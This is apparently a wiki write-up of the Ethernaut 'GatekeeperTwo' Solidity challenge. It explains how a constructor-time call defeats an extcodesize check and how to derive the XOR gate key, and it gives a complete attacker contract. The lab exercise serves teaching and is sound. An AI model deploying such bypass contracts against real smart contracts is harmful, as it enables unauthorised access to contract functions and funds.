14. GatekeeperTwo

r1oga edited this page Oct 29, 2022 · 1 revision

Target

Make it through the gatekeeper two.

Weakness

  • gateOne relies on tx.origin, which only tells the contract that the call did not come directly from an externally owned account.
  • Because the contract logic is public, reading it is enough to learn how to pass gateTwo and gateThree.

Solidity Concepts

Inline assembly & contract creation/initialization

extcodesize and contract initialization

From the Ethereum yellow paper section 7.1 - subtleties we learn:

while the initialisation code is executing, the newly created address exists but with no intrinsic body code [4]. [4] During initialization code execution, EXTCODESIZE on the address should return zero [...]

Hack

  1. gateOne: similar to the gateOne of Level 13 - Gatekeeper One or to the hack of Level 4 - Telephone: call enter from a contract so that msg.sender != tx.origin.
  2. gateTwo: call the enter function during contract initialization, i.e. from within the constructor, to ensure EXTCODESIZE(msg.sender) = 0.
  3. gateThree
    uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey), where a ^ b means a XOR b (bitwise exclusive or).
    uint64(0) - 1 underflows to 2^64 - 1 (type(uint64).max), the uint64 in which every bit is 1.
    So we need _gateKey = ~a (bitwise NOT), where a = uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) and msg.sender is the attacking contract's address, to ensure that the XOR of each bit of a and b is 1.

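The three steps above carried through in one Solidity contract, as an added example that is not the wiki's own code. It assumes the level exposes enter(bytes8) and that the deployer passes the level's address to the constructor.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Assumed minimal interface of the GatekeeperTwo level.
interface IGatekeeperTwo {
    function enter(bytes8 _gateKey) external returns (bool);
}

contract GatekeeperTwoSolver {
    // Everything happens in the constructor: while it runs, this contract's
    // address already exists but EXTCODESIZE(address(this)) is still 0,
    // which is exactly what gateTwo checks for.
    constructor(address level) {
        // gateThree expects a ^ key == uint64(0) - 1 == type(uint64).max
        // (every bit set). The level hashes msg.sender, which from its point
        // of view is this contract's address, so derive a from address(this).
        uint64 a = uint64(bytes8(keccak256(abi.encodePacked(address(this)))));
        // Bitwise NOT flips every bit of a, so a ^ ~a has every bit set.
        bytes8 key = bytes8(~a);

        // gateOne: msg.sender is this contract, tx.origin is the deploying EOA,
        // so they differ and the check passes.
        bool ok = IGatekeeperTwo(level).enter(key);
        require(ok, "enter failed");
    }
}
```

Deploying this contract from an externally owned account is the whole exploit; once the constructor returns, the contract has code and the same call would fail gateTwo.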
Takeaways

During contract initialization, the contract has no intrinsic body code and its extcodesize is 0, so an extcodesize == 0 check cannot reliably distinguish an externally owned account from a contract.